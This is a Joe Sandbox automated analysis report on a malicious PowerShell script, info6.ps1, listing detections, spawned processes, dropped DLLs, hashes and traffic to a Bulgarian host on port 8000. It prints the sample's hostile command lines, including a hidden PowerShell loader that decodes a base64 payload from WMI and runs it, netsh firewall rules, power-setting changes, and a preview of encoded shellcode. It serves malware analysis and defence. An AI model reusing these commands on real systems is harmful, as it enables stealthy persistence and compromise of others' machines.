
ID: 64868 Sample Name: info6.ps1 Cookbook: default.jbs Time: 20:26:29 Date: 20/06/2018 Version: 22.0.0

Table of Contents

Table of Contents 2
Analysis Report 4
Overview 4
General Information 4
Detection 4
Confidence 5
Classification 5
Analysis Advice 6
Signature Overview 6
AV Detection: 7
Networking: 7
Boot Survival: 7
Persistence and Installation Behavior: 7
Data Obfuscation: 7
Spreading: 7
System Summary: 7
HIPS / PFW / Protection Evasion: 8
Anti Debugging: 8
Malware Analysis System Evasion: 8
Hooking and other Techniques for Hiding and Protection: 8
Lowering of HIPS / PFW / Operating System Security Settings: 8
Language, Device and Operating System Detection: 8
Behavior Graph 8
Simulations 9
Behavior and APIs 9
Antivirus Detection 9
Initial Sample 9
Dropped Files 9
Unpacked PE Files 9
Domains 10
URLs 10
Yara Overview 10
Initial Sample 10
PCAP (Network Traffic) 10
Dropped Files 10
Memory Dumps 10
Unpacked PEs 10
Joe Sandbox View / Context 10
IPs 10
Domains 10
ASN 10
Dropped Files 10
Screenshots 11
Startup 11
Created / dropped Files 12
Contacted Domains/Contacted IPs 15
Contacted Domains 16
Contacted URLs 16
Contacted IPs 16
Public 16
Static File Info 16
General 16
File Icon 17

Copyright Joe Security LLC 2018 Page 2 of 28

Network Behavior 17
TCP Packets 17
ICMP Packets 17
HTTP Request Dependency Graph 17
HTTP Packets 17
Code Manipulations 18
Statistics 18
Behavior 18
System Behavior 18
Analysis Process: .exe PID: 3384 Parent PID: 2984 18
General 18
File Activities 19
File Created 19
File Deleted 19
File Written 19
File Read 21
Registry Activities 23
Key Value Created 23
Analysis Process: .exe PID: 3604 Parent PID: 3384 23
General 23
Registry Activities 23
Analysis Process: netsh.exe PID: 3620 Parent PID: 3384 23
General 23
Registry Activities 23
Analysis Process: netsh.exe PID: 3648 Parent PID: 3384 24
General 24
Analysis Process: netsh.exe PID: 3696 Parent PID: 3384 24
General 24
Analysis Process: netsh.exe PID: 3716 Parent PID: 3384 24
General 24
Analysis Process: netsh.exe PID: 3748 Parent PID: 3384 24
General 25
Analysis Process: schtasks.exe PID: 3940 Parent PID: 3384 25
General 25
Analysis Process: powercfg.exe PID: 3952 Parent PID: 3384 25
General 25
Analysis Process: powercfg.exe PID: 3960 Parent PID: 3384 25
General 25
Analysis Process: powercfg.exe PID: 3968 Parent PID: 3384 26
General 26
Analysis Process: .EXE PID: 3980 Parent PID: 3384 26
General 26
Analysis Process: csc.exe PID: 2140 Parent PID: 3384 26
General 26
Analysis Process: NETSTAT.EXE PID: 2180 Parent PID: 3384 26
General 27
Analysis Process: cvtres.exe PID: 2212 Parent PID: 2140 27
General 27
Analysis Process: powershell.exe PID: 2524 Parent PID: 3384 27
General 27
Analysis Process: NETSTAT.EXE PID: 2696 Parent PID: 3384 27
General 27
Analysis Process: csc.exe PID: 2644 Parent PID: 2524 28
General 28
Analysis Process: cvtres.exe PID: 2060 Parent PID: 2644 28
General 28
Disassembly 28
Code Analysis 28

Analysis Report

Overview

General Information

Joe Sandbox Version: 22.0.0
Analysis ID: 64868
Time: 20:26:29
Joe Sandbox Product: CloudBasic
Start date: 20.06.2018
Overall analysis duration: 0h 5m 54s
Hypervisor based Inspection enabled: false
Report: light
Sample file name: info6.ps1
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled
Analysis stop reason:
Detection: MAL
Classification: mal92.winPS1@37/20@0/1
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
EGA Information: Failed
HDC Information: Failed
Cookbook Comments: Adjust boot time; Correcting counters for adjusted boot time; Found application associated with file extension: .ps1
Warnings:
• Exclude process from analysis (whitelisted): WmiPrvSE.exe, WmiApSrv.exe, conhost.exe, dllhost.exe
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Skipping Hybrid Code Analysis (implementation is based on Java, ., VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, csc.exe

Detection

Strategy: Threshold
Score: 92
Range: 0 - 100
Reporting: Report FP / FN

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false

Classification

Classification chart (figure): categories Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware; scale malicious / suspicious / clean

Analysis Advice

Sample drops PE files which have not been started; submit the dropped PE samples to Joe Sandbox for a secondary analysis.

Signature Overview

• AV Detection
• Networking
• Boot Survival
• Persistence and Installation Behavior
• Data Obfuscation
• Spreading
• System Summary
• HIPS / PFW / Operating System Protection Evasion
• Anti Debugging
• Malware Analysis System Evasion
• Hooking and other Techniques for Hiding and Protection
• Lowering of HIPS / PFW / Operating System Security Settings
• Language, Device and Operating System Detection

AV Detection:

Antivirus detection for dropped file

Networking:

Detected TCP or UDP traffic on non-standard ports

Uses known network protocols on non-standard ports

Uses netstat to query active network connections and open ports

HTTP GET or POST without a user agent

Downloads files from webservers via HTTP

Urls found in memory or binary data

Boot Survival:

Uses schtasks.exe or .exe to add and modify task schedules

Creates or modifies windows services

Persistence and Installation Behavior:

Drops PE files

Data Obfuscation:

Suspicious powershell command line found

Compiles C# or VB.Net code

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Enumerates the file system

System Summary:

Powershell connects to network

Uses powercfg.exe to modify the power settings

Abnormal high CPU Usage

Creates mutexes

PE file does not import any functions

Classification

Creates files inside the user directory

Creates temporary files

Found command line output

Parts of this application are using the .NET runtime (probably coded in C#)

Queries process information (via WMI, Win32_Process)

Reads ini files

Reads software policies

Spawns processes

Uses an in-process (OLE) Automation server

Found graphical window changes (likely an installer)

Uses Microsoft Silverlight

Submission file is bigger than most known malware samples

Uses new MSVCR Dlls

Binary contains paths to symbols

HIPS / PFW / Operating System Protection Evasion:

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Enables debug privileges

Creates guard pages, often used to prevent reverse engineering and debugging

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Contains long sleeps (>= 3 min)

Enumerates the file system

Found dropped PE file which has not been started or loaded

May (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries a list of all running processes

Hooking and other Techniques for Hiding and Protection:

System process connects to network (likely due to code injection or exploit)

Uses known network protocols on non-standard ports

Disables application error messages (SetErrorMode)

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies power options to not sleep / hibernate

Uses netsh to modify the Windows network and firewall settings

Language, Device and Operating System Detection:

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Queries the cryptographic machine GUID

Behavior Graph

Behavior graph (figure; text recovered from the image):

ID: 64868; Sample: info6.ps1; Startdate: 20/06/2018; Architecture: WINDOWS; Score: 92
Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious
powershell.exe (13 created registry values, 12 created files): Detected TCP or UDP traffic on non-standard ports; Antivirus detection for dropped file; Suspicious powershell command line found; 6 other signatures
DNS/IP info: 87.121.98.215, 49163, 8000 (TAMATIYA-ASBG, Bulgaria)
powershell.exe started csc.exe, netsh.exe and 12 other processes
powershell.exe (child instance): Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); System process connects to network (likely due to code injection or exploit); Detected TCP or UDP traffic on non-standard ports; Suspicious powershell command line found; 2 other signatures
Dropped: C:\Users\user\AppData\Local\...\rfy2neso.dll, PE32; C:\Users\user\AppData\Local\...\cvkkx-1q.dll, PE32
csc.exe started cvtres.exe (for each of the two csc.exe instances)

Simulations

Behavior and APIs

Time Type Description
20:26:45 API Interceptor 142x Sleep call for process: powershell.exe modified
20:27:27 API Interceptor 12x Sleep call for process: netsh.exe modified
20:27:43 API Interceptor 2x Sleep call for process: schtasks.exe modified
20:27:44 API Interceptor 3x Sleep call for process: powercfg.exe modified
20:27:45 API Interceptor 3x Sleep call for process: NETSTAT.EXE modified
20:28:07 API Interceptor 2x Sleep call for process: cvtres.exe modified

Antivirus Detection

Initial Sample

Source Detection Scanner Label
info6.ps1 5% virustotal
info6.ps1 8% metadefender

Dropped Files

Source Detection Scanner Label
C:\Users\user\AppData\Local\Temp\rfy2neso.dll 100% Avira HEUR/AGEN.1019608
C:\Users\user\AppData\Local\Temp\cvkkx-1q.dll 100% Avira HEUR/AGEN.1019608

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

Match: 87.121.98.215
Associated Sample Name / URL: info3.ps1
SHA 256: e92251cb5557d832c64143e30c4948781f60e7d19deac2fcd3b67761abdd2357
Detection: malicious
Context: 87.121.98.215:8000/.txt

Domains

No context

ASN

Match: TAMATIYA-ASBG
Associated Sample Name / URL: info3.ps1; SHA 256: e92251cb5557d832c64143e30c4948781f60e7d19deac2fcd3b67761abdd2357; Detection: malicious; Context: 87.121.98.215
Associated Sample Name / URL: .exe; SHA 256: 777258a741a9c250b16d13a30e1bdf657f7d95c50499de73ebb4800d1c0fe211; Detection: malicious; Context: 79.124.59.10

Dropped Files

No context

Screenshots

Startup

System is w7
powershell.exe (PID: 3384 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\info6.ps1' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  netsh.exe (PID: 3604 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add policy name=netbc MD5: 784A50A6A09C25F011C3143DDD68E729)
  netsh.exe (PID: 3620 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filterlist name=block MD5: 784A50A6A09C25F011C3143DDD68E729)
  netsh.exe (PID: 3648 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filteraction name=block action=block MD5: 784A50A6A09C25F011C3143DDD68E729)
  netsh.exe (PID: 3696 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445 MD5: 784A50A6A09C25F011C3143DDD68E729)
  netsh.exe (PID: 3716 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add rule name=block policy=netbc filterlist=block filteraction=block MD5: 784A50A6A09C25F011C3143DDD68E729)
  netsh.exe (PID: 3748 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static set policy name=netbc assign=y MD5: 784A50A6A09C25F011C3143DDD68E729)
  schtasks.exe (PID: 3940 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  powercfg.exe (PID: 3952 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
  powercfg.exe (PID: 3960 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
  powercfg.exe (PID: 3968 cmdline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
  NETSTAT.EXE (PID: 3980 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561)
  csc.exe (PID: 2140 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)
    cvtres.exe (PID: 2212 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES501D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC4E3C.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364)
  NETSTAT.EXE (PID: 2180 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561)
  powershell.exe (PID: 2524 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:coredpussvr').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value;iex ([System.Text.Encoding]::ASCII.GetString([System.]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    csc.exe (PID: 2644 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cvkkx-1q.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)
      cvtres.exe (PID: 2060 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RESD500.tmp' 'c:\Users\user\AppData\Local\Temp\CSCD405.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364)
  NETSTAT.EXE (PID: 2696 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561)
cleanup

Created / dropped Files

C:\Users\HERBBL~1\AppData\Local\Temp\RES501D.tmp
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type: data
Size (bytes): 2064
Entropy (8bit): 2.4206455899570347
Encrypted: false
MD5: 4E92534C4283342787DF59528CC52F65
SHA1: CA162F5398E1213CB78094AB196EA96AEE43A751
SHA-256: 18673E6AC3B3F15D922DA5C00EC105B8105B6C5AAFD4D74AF6080C7C100AF478
SHA-512: 456BF21CB7BD9EE8A8C2D1D195076C03E13E73476AA3303E278A267261E04C26712D1C26D1C371948BB236E78974A1850CD95A42242B11F8C77F0C4AD697232F
Malicious: false
Reputation: low

C:\Users\HERBBL~1\AppData\Local\Temp\RESD500.tmp
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type: data
Size (bytes): 2064
Entropy (8bit): 2.434136513000324
Encrypted: false
MD5: 312EDD968BD35DD5811FB93F0091FC79
SHA1: 40DE4BA3D25B19217691E4B2C5011E4F142F7FD9
SHA-256: EB881F2E76590C94BCEBF218C35C6EAB4AEB520ACACBD38A504EDEE270BC782A
SHA-512: E0055AF80D607865D6E006D7B764D6F52A3E3A1E8D15172D7C8AB62DB8884167546648BC2E2556667972E1CE24203A7B9937AB3F68529C1118C661CEEF1A1790
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Temp\CSC4E3C.tmp
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type: MSVC .res
Size (bytes): 652
Entropy (8bit): 3.078257301127696
Encrypted: false
MD5: 1CB3759EAB892AFB3D135D9881239802
SHA1: D7BD5EA08CEF547380471029884D3FEC9323E0EC
SHA-256: 2933D6A58EB97383F747F900E645E00B3F4AD0E814856B65B11CAA5E439CE26B
SHA-512: F38B435EA9B13D51E88160E4610C206AEC18F447AA62B4754B93408AD7B81327EA46356899F9726E5D4F302837099C99E1A974FC872B0D78519C9603B3C4B30E
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Temp\CSCD405.tmp
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type: MSVC .res
Size (bytes): 652
Entropy (8bit): 3.139068505991067
Encrypted: false
MD5: C8B7813DA081BCEC06604076284D7DDD
SHA1: C41BD7C5A7C64D09AC2B4E757E0811DF4541F5CC
SHA-256: 202C26850D070DF428E9AFC3DD51713835CA864F89742233AE26A2F099C6D0CE
SHA-512: 1997A97076F22D034AB16E4AA14DCC08BA43D21F25F4AE8BF36BEEFD28771251CB45CA05AAB76FE77D53CA37377F1E65F3EE85C330B9684A7618BCB53AC362C5
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Temp\cvkkx-1q.0.cs
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 5826
Entropy (8bit): 4.9118391565359545
Encrypted: false
MD5: BE45C5DB7A9A66F35401E2B00BBDB856
SHA1: 354DC7D3F4D6F80359B0BA99081C0B6705F49480
SHA-256: 1CEEFFDD10ECE58A1B0F298BF4BD2CA65E1EF5CD50248F89F89870E21C7E5E3B
SHA-512: A33F9D0FCA8ED8513CB9F16155C124C3259C56D7C8B90B6376095672288852B275B2ECA7006D7CB1A45A5EBE600075D459DFF71C21C181B26D0E66034AB0DF4F
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Temp\cvkkx-1q.cmdline
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Size (bytes): 327
Entropy (8bit): 5.379194927430392
Encrypted: false
MD5: 07D8A72FAE41181F605C7DD7143466B5
SHA1: 969CC5805DAE3691E814DC63125049BCBEAA0772
SHA-256: 120909A05012EBA5EA8D338EA080C99AC017347644A34401DC41639FAC4C0675
SHA-512: C3A7AFFDC36DEF055235EF3A6C0B06C490108C8F668AA99C7F2E71C7472C6882912174C2309B5A4FFCB908837D66E3ED05F99E617C6465AEEB6E0B7877808342
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Temp\cvkkx-1q.dll
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes): 6656
Entropy (8bit): 4.225812081368049
Encrypted: false
MD5: EEE0102FD19D235F85AC604E3C9BB27C
SHA1: 603EBD07E1ED56FBFB53FF09031F116B2CBC2392
SHA-256: 2AFA89BD9BB38FB1DAFDB95F0F54DEF3A31A01CA2E6463AB07DA143CD11C3533
SHA-512: 99330DCB43FD47DEC4371A44B1B4FE8957A7E9E568898C7F54B4A2AC62A40B9FD5ACDE5E1EC6DA108C9019AD0CA8737ECCC713A57476B527AAD7B606B881CC44
Malicious: true
Antivirus: Avira, Detection: 100%

C:\Users\user\AppData\Local\Temp\cvkkx-1q.out
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Size (bytes): 422
Entropy (8bit): 5.467206418058541
Encrypted: false
MD5: 1EC4D08AF533EE6B25E49038FD2D696F
SHA1: 032E90F7D85BB3E1A9E809F993B398E33818E576
SHA-256: 83A622A4241590271D8E84AB3A5A2518ABF574918662080653FDCFAD61BAEA1D
SHA-512: E8356B7FC2C404850F44C04EBEBC23D0A73983FC6E8FF7D22DD25DEB44D4C92BF0B8902C77A26BAA4A9FBAA8E1FCB9A696D2BB8036B4237D265AB6571C17E18B
Malicious: false

C:\Users\user\AppData\Local\Temp\cvkkx-1q.pdb
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type: data
Size (bytes): 25005
Entropy (8bit): 1.6181460620684103
Encrypted: false
MD5: 1721A66D3F20ECC251B6CDEBD4C8C13B
SHA1: 36326B08FA246630575553DD766790C38238D766
SHA-256: 63756B9381EFDBD3FB8DDC6CF32834448F5052B1554930B8CB719F30C0639811
SHA-512: 0924A159683B6D7404854D91F70459A7F722F8DF74B4F1B8D2EA60098939ADEDBBFB6DC4F45950F960060D1C3A8FD91FBD9A9C1C6C4B409AC5D07DF2ABAAC1C0
Malicious: false

C:\Users\user\AppData\Local\Temp\rfy2neso.0.cs
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 5826
Entropy (8bit): 4.9118391565359545
Encrypted: false
MD5: BE45C5DB7A9A66F35401E2B00BBDB856
SHA1: 354DC7D3F4D6F80359B0BA99081C0B6705F49480
SHA-256: 1CEEFFDD10ECE58A1B0F298BF4BD2CA65E1EF5CD50248F89F89870E21C7E5E3B
SHA-512: A33F9D0FCA8ED8513CB9F16155C124C3259C56D7C8B90B6376095672288852B275B2ECA7006D7CB1A45A5EBE600075D459DFF71C21C181B26D0E66034AB0DF4F
Malicious: false

C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Size (bytes): 327
Entropy (8bit): 5.288875891478697
Encrypted: false
MD5: 66144B5F92CA3DCD1E57021D5979733E
SHA1: F52986F730D2CAD733F475E60252409623197124
SHA-256: 57CEDEF208DBA8BE4BCDFD4127CC064B9EA71B445D682A187A08226467691006
SHA-512: A09C8BFA417DD4D6643BFFC3E1039124ED847ED54075B8142F574C52B936DAA747D66678544EF804B7EFCCB8535902032DF40A51695C61943DC815B8E3D07212
Malicious: false

C:\Users\user\AppData\Local\Temp\rfy2neso.dll
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes): 6656
Entropy (8bit): 4.220611172320333
Encrypted: false
MD5: F210C481FCE0812A26BEE5CE3FF11577
SHA1: C2FEFD9FD9F982B60614E552EA5FCF574C513B82
SHA-256: 96401493A24B56D20E42DE79D8AF39ED599E1D7FF9515EA8E4F08CE3E3173472
SHA-512: 50E5BE148B0F8C72A0FE1BD0C73B6C3D1F99ABAA162F6155B4AE55C2F8F73041E0566B0D2D360DC3159E843366C08E7C803F0483A0294B8BCFB3E62654F25405
Malicious: true
Antivirus: Avira, Detection: 100%

C:\Users\user\AppData\Local\Temp\rfy2neso.out
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type: ASCII text, with CRLF line terminators
Size (bytes): 198
Entropy (8bit): 4.894444435447009
Encrypted: false
MD5: 182738883BFDFB548627BEC18305C7EE
SHA1: FD5A8D41B96844985C0DC21116CFA689CED8AABE
SHA-256: 5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622
SHA-512: 9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D73628FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0
Malicious: false

C:\Users\user\AppData\Local\Temp\rfy2neso.pdb
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type: data
Size (bytes): 25005
Entropy (8bit): 1.6151888280775484
Encrypted: false
MD5: 775B77D4BD8C0DB6EBA3B0F3753F87BD
SHA1: 0D16432D78DCCB4C0C6E9D8F518E09615554EFC0
SHA-256: 57E2911B535235CC7626C5937B975AD0BC8A15D0B61D51D241910403610E5CAE
SHA-512: DDD83CE1F450EA43725474529B46B3EF2B56949F6231191A601C5DA4E1B8151DD84402F466DAF7DECC5C47058BABD72FE2C14E8C560830879148C620A37B3A2E
Malicious: false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2QNP9L1LI3OJHOCM4WD6.temp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Size (bytes): 8016
Entropy (8bit): 3.568699490955571
Encrypted: false
MD5: 178E171AA9C7B8FE0BFE7FBED6EFE82C
SHA1: 3656D8D111B1CAA69EB106AF479251B5B675ABF7
SHA-256: 7936F4C0D68528DF97C96C33C65A5CFD8DA5A763F58ADD86529E8A361B2590DF
SHA-512: 506B4081DC66467D70AF97F5578587F9412F5B163916672277AF1D1315B56BB398021BB2A18D11B4DC69081B0F838340AB6EDC594DC7523F4DC8DAFE1129ADAD
Malicious: false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C1CSPJYK7FU47I8OU5ZB.temp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Size (bytes): 8016
Entropy (8bit): 3.568699490955571
Encrypted: false
MD5: 178E171AA9C7B8FE0BFE7FBED6EFE82C
SHA1: 3656D8D111B1CAA69EB106AF479251B5B675ABF7
SHA-256: 7936F4C0D68528DF97C96C33C65A5CFD8DA5A763F58ADD86529E8A361B2590DF
SHA-512: 506B4081DC66467D70AF97F5578587F9412F5B163916672277AF1D1315B56BB398021BB2A18D11B4DC69081B0F838340AB6EDC594DC7523F4DC8DAFE1129ADAD
Malicious: false

stdout
Process: C:\Windows\System32\NETSTAT.EXE
File Type: ASCII text, with CRLF line terminators
Size (bytes): 855
Entropy (8bit): 3.572884291068745
Encrypted: false
MD5: 13F43918C1C2DDB8CD83C6C357795F3A
SHA1: 2E506707849FB6E5619E248AC36DFF4B7FA60D30
SHA-256: FB9AF23D55D2C1C9ADE9BCA947EE53077BD900BC73A43D2E6EC2E591036E9434
SHA-512: C0BD92E36D560028241AED41C4DB0B6E30D443A687132B27F2AFCB11FB18C6C7D36DB583A7EBD8CEF0C32400C5E31F4A7F5FC32DCED9568A53C80976D034D559
Malicious: false

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name Process
http://87.121.98.215:8000/ver.txt C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Contacted IPs


Public

IP Country ASN ASN Name Malicious
87.121.98.215 Bulgaria 50360 TAMATIYA-ASBG true

Static File Info

General

File type: ASCII text, with very long lines, with no line terminators
Entropy (8bit): 5.463131940959833
TrID:
File name: info6.ps1
File size: 4262380
MD5: 43a1902a3e565b60ae44a61f7f83cb87
SHA1: 47740f72441b91d48cebc4bbb1cb104e3d921c15
SHA256: c08700057afe58bcbb1661d68f80ea3fcd04e30d5f2e789d8ade0ae2dbff30db
SHA512: 250cf1df4286da78a46bfee6f0644e9609906cea45b14ab8a4ecb460e73f6ece65818a7f9873bf404dbee6e6e448d5ca07207a31e9e4d40ac07a32a2128a3d44
File Content Preview: $fa = "VWoBVUFQSIPsIL/EXBlt6DUAAABIjU0QTTHJvzRGzK/oJAAAAEiDxECFwHSjSItFIIB4GgF0CUiJAEiJQAjrkFhbXl9BXkFfw+gCAAAA/+BTUVZBi0c8QYuEB4gAAABMAfhQi0gYi1ggTAH7/8mLNItMAf7oHwAAADn4de9Yi1gkTAH7ZosMS4tYHEwB+4sEi0wB+F5ZW8NSMcCZrMHKDQHChcB19pJaw1VTV1ZBV0mLKEyLfQhSXkyJ

File Icon

Network Behavior

TCP Packets

Timestamp Source Port Dest Port Source IP Dest IP
Jun 20, 2018 20:28:18.411144018 CEST 49163 8000 192.168.2.2 87.121.98.215
Jun 20, 2018 20:28:18.456084967 CEST 8000 49163 87.121.98.215 192.168.2.2
Jun 20, 2018 20:28:18.456218958 CEST 49163 8000 192.168.2.2 87.121.98.215
Jun 20, 2018 20:28:18.456597090 CEST 49163 8000 192.168.2.2 87.121.98.215
Jun 20, 2018 20:28:18.501066923 CEST 8000 49163 87.121.98.215 192.168.2.2
Jun 20, 2018 20:28:18.501296997 CEST 8000 49163 87.121.98.215 192.168.2.2
Jun 20, 2018 20:28:18.742770910 CEST 8000 49163 87.121.98.215 192.168.2.2
Jun 20, 2018 20:28:18.742876053 CEST 49163 8000 192.168.2.2 87.121.98.215

ICMP Packets

Timestamp Source IP Dest IP Checksum Code Type
Jun 20, 2018 20:27:10.083206892 CEST 192.168.2.2 87.121.98.215 4d5a
Jun 20, 2018 20:27:10.127677917 CEST 87.121.98.215 192.168.2.2 555a Echo Reply
Jun 20, 2018 20:27:11.161484003 CEST 192.168.2.2 87.121.98.215 4d59 Echo
Jun 20, 2018 20:27:11.205857992 CEST 87.121.98.215 192.168.2.2 5559 Echo Reply
Jun 20, 2018 20:27:12.232120037 CEST 192.168.2.2 87.121.98.215 4d58 Echo
Jun 20, 2018 20:27:12.276514053 CEST 87.121.98.215 192.168.2.2 5558 Echo Reply
Jun 20, 2018 20:27:13.314919949 CEST 192.168.2.2 87.121.98.215 4d57 Echo
Jun 20, 2018 20:27:13.363086939 CEST 87.121.98.215 192.168.2.2 5557 Echo Reply
Jun 20, 2018 20:28:14.766578913 CEST 192.168.2.2 87.121.98.215 4d56 Echo
Jun 20, 2018 20:28:14.814902067 CEST 87.121.98.215 192.168.2.2 5556 Echo Reply
Jun 20, 2018 20:28:15.850610018 CEST 192.168.2.2 87.121.98.215 4d55 Echo
Jun 20, 2018 20:28:15.896051884 CEST 87.121.98.215 192.168.2.2 5555 Echo Reply
Jun 20, 2018 20:28:16.924745083 CEST 192.168.2.2 87.121.98.215 4d54 Echo
Jun 20, 2018 20:28:16.968987942 CEST 87.121.98.215 192.168.2.2 5554 Echo Reply
Jun 20, 2018 20:28:18.008594036 CEST 192.168.2.2 87.121.98.215 4d53 Echo
